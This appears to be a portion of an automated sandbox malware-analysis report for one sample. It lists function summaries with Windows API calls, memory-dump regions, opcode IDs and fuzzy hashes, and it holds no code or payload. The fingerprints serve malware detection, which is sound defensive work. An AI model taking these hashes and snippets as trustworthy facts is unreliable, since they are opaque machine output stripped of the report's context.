                                                                                                                        • Instruction ID: 2a6454ed490273c7b216e400dfc9953c78de16ad747aa9030abf2a1f534fd16f
                                                                                                                        • Opcode Fuzzy Hash: cc29250876f28ea18277ba22e5ee3750e4adabe2d7a998b84ed4848a9dad37de
                                                                                                                        • Instruction Fuzzy Hash: 8851D0B1D003499FDB14DF99C984ADEFBB5FF88310F24812AE819AB210D774A885CF91
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F866C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108594367.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6f80000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 716092398-0
                                                                                                                        • Opcode ID: eca83e940e48bb812fa1bbc9e12d2617d2d1355a2ddffd9224e5c720c8c6471d
                                                                                                                        • Instruction ID: ac965f69535619e24f8160f145a452161e993a3126d49a1185ea332218e0720c
                                                                                                                        • Opcode Fuzzy Hash: eca83e940e48bb812fa1bbc9e12d2617d2d1355a2ddffd9224e5c720c8c6471d
                                                                                                                        • Instruction Fuzzy Hash: 5241CEB1D003499FDB14DFA9C984ADEFBB5BF48310F24812AE819AB210D774A885CF91
                                                                                                                        APIs
                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 06F88DB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108594367.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6f80000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallProcWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2714655100-0
                                                                                                                        • Opcode ID: 7324f795e098de978b7b19f4bed2a2bae9a71992a0b989b3ce48bd274642f6d8
                                                                                                                        • Instruction ID: 1cce290dcd8572f71b474a825622ab52a6ceaca535dfc17bf156196b56b4a3c2
                                                                                                                        • Opcode Fuzzy Hash: 7324f795e098de978b7b19f4bed2a2bae9a71992a0b989b3ce48bd274642f6d8
                                                                                                                        • Instruction Fuzzy Hash: 42416CB5900205CFDB54DF99C848AAAFBF6FF88314F24C499D519AB321C734A841CFA0
                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 064ABB1F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108338151.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_64a0000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: 4a1ca12c3502721379f7effcb62c81b629b369c212ac8f8a7f31b894bbfb3298
                                                                                                                        • Instruction ID: 086ffddbc057cab35d5819ad283c25453efc43f7119774d2cb5e57a1a9067770
                                                                                                                        • Opcode Fuzzy Hash: 4a1ca12c3502721379f7effcb62c81b629b369c212ac8f8a7f31b894bbfb3298
                                                                                                                        • Instruction Fuzzy Hash: 6A21C4B5D00259AFDB10CF9AD984ADEFBF4EB48310F14841AE954A7350D378A944CFA5
                                                                                                                        APIs
                                                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 061C9AA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108131259.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_61c0000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 22440d6298487ca8626a803cc5477718a9f7e5e2f5299386f7d760e26a2f6654
                                                                                                                        • Instruction ID: 40f7a3181b895cb9ddfe24b50a5beb33b63cff3b4b98a6e14ce1221c0ea1353a
                                                                                                                        • Opcode Fuzzy Hash: 22440d6298487ca8626a803cc5477718a9f7e5e2f5299386f7d760e26a2f6654
                                                                                                                        • Instruction Fuzzy Hash: 84117FB4E001099FDB44DFA9D484EADBBB5FB88324F14D968E904E7355DB30E841CB60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108169879.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_63b0000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: KDBM
                                                                                                                        • API String ID: 0-3504354710
                                                                                                                        • Opcode ID: 8540426700c80717b141773c4fad81158aba02a47738fe7ef00ce3b79f4fe9aa
                                                                                                                        • Instruction ID: 179c3c1481147b57ddba7fc39b388d3b5d3ba4c623bb2e0b8d1bb514de8211a8
                                                                                                                        • Opcode Fuzzy Hash: 8540426700c80717b141773c4fad81158aba02a47738fe7ef00ce3b79f4fe9aa
                                                                                                                        • Instruction Fuzzy Hash: 79E10670A002298FDBA4DF68D850BDDBBB2FB89300F0095E9E509A7395DB745E85CF90
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 06F8462E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108594367.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6f80000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 6081a2e59d41c9dee59bed2cbac081605cb623535503d76264af107880128c9c
                                                                                                                        • Instruction ID: 34ff90a74b6a6ae25e3f6aea8dd765dea4cbaf6582a2099322bd40377f09c9eb
                                                                                                                        • Opcode Fuzzy Hash: 6081a2e59d41c9dee59bed2cbac081605cb623535503d76264af107880128c9c
                                                                                                                        • Instruction Fuzzy Hash: 34112EB6C006498FCB10DF9AD844BDEFBF4EF89324F10846AD828A7210D378A545CFA5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                        • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4103914064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.4103897598.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103935605.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103996215.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocString_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 959018026-0
                                                                                                                        • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                        • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                        • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                        • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                        APIs
                                                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4103914064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.4103897598.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103935605.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103996215.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 10892065-0
                                                                                                                        • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                        • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                        • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                        • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108169879.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_63b0000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: nKvq
                                                                                                                        • API String ID: 0-3625296599
                                                                                                                        • Opcode ID: 97479cf1722093c10daa02d5dc45a961904baf270110b9985001e32dc920a8a5
                                                                                                                        • Instruction ID: a78bf5624086cee22bcbf154be6cdd5c4d5f00745c62c3a4c1c0ea1c075a235e
                                                                                                                        • Opcode Fuzzy Hash: 97479cf1722093c10daa02d5dc45a961904baf270110b9985001e32dc920a8a5
                                                                                                                        • Instruction Fuzzy Hash: B061B374E00219DFDB44DFA9D954AEEBBB2FF88300F10842AE909AB354DB355A45CF90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (o^q
                                                                                                                        • API String ID: 0-74704288
                                                                                                                        • Opcode ID: 7bcd6905ffbc7b6a222cb0a018f41448b099c9311cefa13608469124cdab4f89
                                                                                                                        • Instruction ID: b49332749a508c32e9498e3c2b98b04639fdf937b53f2f3880af1047acae3efd
                                                                                                                        • Opcode Fuzzy Hash: 7bcd6905ffbc7b6a222cb0a018f41448b099c9311cefa13608469124cdab4f89
                                                                                                                        • Instruction Fuzzy Hash: FF41D231B442449FCB199F68D8546AE7BB6AFC9310F148469E906DB391CF319D16CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fc2480824fc076cb46ee0efb4e0bf820533185a7bd4244b8da8513f0ab338cac
                                                                                                                        • Instruction ID: a75498178f1b81e095940df0496d917ed759366abcbde0409713901208d29d45
                                                                                                                        • Opcode Fuzzy Hash: fc2480824fc076cb46ee0efb4e0bf820533185a7bd4244b8da8513f0ab338cac
                                                                                                                        • Instruction Fuzzy Hash: 6012A9749753468F92882F32A6AE56EBEA1FB4F36B7016D41F29F84404CF301598CF68
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1b15ade421e023776f75329c99fde5a23a6d2cc703adc435e1bf878964f05e21
                                                                                                                        • Instruction ID: edb737d4f074b046e0a64d2a8b41a8e9ade6250b7bdfff3032b34dffca300035
                                                                                                                        • Opcode Fuzzy Hash: 1b15ade421e023776f75329c99fde5a23a6d2cc703adc435e1bf878964f05e21
                                                                                                                        • Instruction Fuzzy Hash: 471298749753468F92882F32A6AE56EBEA1FB4F36B7016D41F29F84404CF301598CF68
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 306b5af4663bd901ef14bb10b8f2dfd66d9544c79f6c6cf539519209c00f695f
                                                                                                                        • Instruction ID: 0aedf0bb86bc15e4a149123cbb823aa0ab978915e44fc9577a12155f76fccf05
                                                                                                                        • Opcode Fuzzy Hash: 306b5af4663bd901ef14bb10b8f2dfd66d9544c79f6c6cf539519209c00f695f
                                                                                                                        • Instruction Fuzzy Hash: 2CF11975A54614CFCF04CF68D588AADBBF2FF88318B1A80A9E515AB361DB31ED41CB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5c4d61e4432b22752c53e6b56673c95036cbfeef9c6726e24f9334df04c89f79
                                                                                                                        • Instruction ID: e5a276442bee248ed01ea145a02c651aedc300031c8b852265a8a045b2771123
                                                                                                                        • Opcode Fuzzy Hash: 5c4d61e4432b22752c53e6b56673c95036cbfeef9c6726e24f9334df04c89f79
                                                                                                                        • Instruction Fuzzy Hash: D0B117347406108FD754DF39C998A297BE2FF89714B2585A8E51ACB3B5DB31EC45CB80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b9ec132fc4bec978d0a2c29ad6e6d7917d4382e3237504281955afeea04317f1
                                                                                                                        • Instruction ID: be873c53411f3b5e8f25da5f93d4945c65ff0e51f0203c0bc0a56745791358a4
                                                                                                                        • Opcode Fuzzy Hash: b9ec132fc4bec978d0a2c29ad6e6d7917d4382e3237504281955afeea04317f1
                                                                                                                        • Instruction Fuzzy Hash: A9A1E4347506008FD754EF39C598A2ABBE2FF89714B2584A8E50ACB775DB31EC41CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108169879.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_63b0000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fa0391c4c136ec971adc553b72ccdc33b96d03a22b4a4e773a11b6e1b99c3603
                                                                                                                        • Instruction ID: eae0197aa00cadd0110813b319517c508337d7a41cdb7cc827e067839cf7fabf
                                                                                                                        • Opcode Fuzzy Hash: fa0391c4c136ec971adc553b72ccdc33b96d03a22b4a4e773a11b6e1b99c3603
                                                                                                                        • Instruction Fuzzy Hash: E0C1A070E012298FDBA4DF69C850BDEBBB2BB89300F1085E9E54DA7290DB745E85CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108169879.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_63b0000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: da66b6a0f42607600f65fb170760f86b5686542df344abfaecbf90ca4e1805ee
                                                                                                                        • Instruction ID: 1c61c979adaf283b5d45588dd1915ac17c312e34bb475f2d71b20117615ac236
                                                                                                                        • Opcode Fuzzy Hash: da66b6a0f42607600f65fb170760f86b5686542df344abfaecbf90ca4e1805ee
                                                                                                                        • Instruction Fuzzy Hash: C2B19070E012298FDBA4DF69C854BDDBBB2BB89300F1085E9E60DA7290DB745E85CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 600dfd3fc57c00213ba73ad465b59cceb934c8372fa7037a74234a97c7a7e322
                                                                                                                        • Instruction ID: fa5593472f5510981c88b255ba42eca657609e78c1badb7b5ab1f16adaae3694
                                                                                                                        • Opcode Fuzzy Hash: 600dfd3fc57c00213ba73ad465b59cceb934c8372fa7037a74234a97c7a7e322
                                                                                                                        • Instruction Fuzzy Hash: 2E715E347802458FCF19DF29C898A6E7BE6AF4A744F1640A9E902CB3B1DB71DC51CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108188713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6410000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6c1316465e1c34ff58788dd67c5ce734b5c97d5a1a489dd8ebc4627788a40619
                                                                                                                        • Instruction ID: 0ca3a3d405b10d0691a6aa2a218777a1ffb87fd07e35dcedec1f85cb987e31cc
                                                                                                                        • Opcode Fuzzy Hash: 6c1316465e1c34ff58788dd67c5ce734b5c97d5a1a489dd8ebc4627788a40619
                                                                                                                        • Instruction Fuzzy Hash: DF819074E412689FDBA5DF29D890BDDBBB2BF89300F1080EAD949A7254DB315E81CF44
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108169879.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_63b0000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5109bfc7385895e740017a69972e3181199a90696646b19152e5f1aa984de88e
                                                                                                                        • Instruction ID: 8ada81a9cd23bf24401f83521de1d716484c961c77ec373f510940c39eceed08
                                                                                                                        • Opcode Fuzzy Hash: 5109bfc7385895e740017a69972e3181199a90696646b19152e5f1aa984de88e
                                                                                                                        • Instruction Fuzzy Hash: 4E61E574E012089FDB44DFE9D990BDDBBF2AF89310F14D429EA08AB795DA309941CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108169879.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_63b0000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ab81610a68e0f1ba095d3119278ddd83ade76d09a58b5fa0aff6a42738b67331
                                                                                                                        • Instruction ID: 03280d8312b1de535182398b0b88f0011f9e25fbcd7c145b83075cf983a6c8cd
                                                                                                                        • Opcode Fuzzy Hash: ab81610a68e0f1ba095d3119278ddd83ade76d09a58b5fa0aff6a42738b67331
                                                                                                                        • Instruction Fuzzy Hash: 0561D474E012089FDB44DFE9D990BDDBBF2AF89310F14E429EA08EB795DA3099418F54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108169879.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_63b0000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 95553ada99c0245ae0224671c6bcafc33f0d36ab5a8d4d09473a3ccb0f1f6beb
                                                                                                                        • Instruction ID: 528a9bf6845a5519aa13283a6e0ba62dc1c075992313d9bb8571eccdb90c1908
                                                                                                                        • Opcode Fuzzy Hash: 95553ada99c0245ae0224671c6bcafc33f0d36ab5a8d4d09473a3ccb0f1f6beb
                                                                                                                        • Instruction Fuzzy Hash: DF61E574E012089FDB44DFE9D990BDDBBF2AF89310F14D429EA08EB799DA3099418B50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108188713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6410000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 42edb795eba4a21e217ef93d6204b07c39049b48d5d00dc68137f4685e739784
                                                                                                                        • Instruction ID: 5b3692c604493d0b26f71f0664a99e6d01a87e359330bd3bd9e170cfa49ab8e0
                                                                                                                        • Opcode Fuzzy Hash: 42edb795eba4a21e217ef93d6204b07c39049b48d5d00dc68137f4685e739784
                                                                                                                        • Instruction Fuzzy Hash: 3F71C074E00208CFDB58DFA5D990AADBBB6FF89300F24952AD415BB358DB359982CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108188713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6410000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 566cf7e0d56059730111798a72953e80ab526d9a35ee83debbb976454bc93613
                                                                                                                        • Instruction ID: 82c97f1f7d22be785c0b7e603a63985bc352132f979a7aa6485db2deea314d03
                                                                                                                        • Opcode Fuzzy Hash: 566cf7e0d56059730111798a72953e80ab526d9a35ee83debbb976454bc93613
                                                                                                                        • Instruction Fuzzy Hash: 2A71B174E00208CFDB58DFA5D990AEDBBB6FF89300F24952AD415AB358DB359942CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108280764.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6460000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bfcc22703c039587c1d1ae07ef597189df566200a386f77a8ae07080bfb0cca0
                                                                                                                        • Instruction ID: 2ffcf83cf7af0c4e82d3a9527a6e51e3b67a1f88bf16add9c1b1aa01f27b82d4
                                                                                                                        • Opcode Fuzzy Hash: bfcc22703c039587c1d1ae07ef597189df566200a386f77a8ae07080bfb0cca0
                                                                                                                        • Instruction Fuzzy Hash: 8471C374E00208DFDB58DFA5D9906AEBBB2FF89300F24912AD415BB358DB359A42CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108280764.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6460000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0183e18ab0100648271ee2a199ec4f2fc292e6c448957c448f96d0b3f8963c4f
                                                                                                                        • Instruction ID: be769ea837808a7adc8ac7b7805a1d3a5741637cfc83db23e74cd2074b341263
                                                                                                                        • Opcode Fuzzy Hash: 0183e18ab0100648271ee2a199ec4f2fc292e6c448957c448f96d0b3f8963c4f
                                                                                                                        • Instruction Fuzzy Hash: 6971B374E00208CFDB58DFA9D9906ADBBB2FF89300F24912AD415BB354DB359946CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8ca38c57c7ea32c0942c26fefaa26b252a1be35c538abb5f277f9b31027fc7ca
                                                                                                                        • Instruction ID: d8b05515fafd63e5107f90286654f64c770a36233b052caddc7e2c9fa39d9830
                                                                                                                        • Opcode Fuzzy Hash: 8ca38c57c7ea32c0942c26fefaa26b252a1be35c538abb5f277f9b31027fc7ca
                                                                                                                        • Instruction Fuzzy Hash: 5D610174D00218DFDB18DFA5D994AEDBBB2FF88305F208529D809AB394DB355A86CF40
                                                                                                                        Memory Dump Source
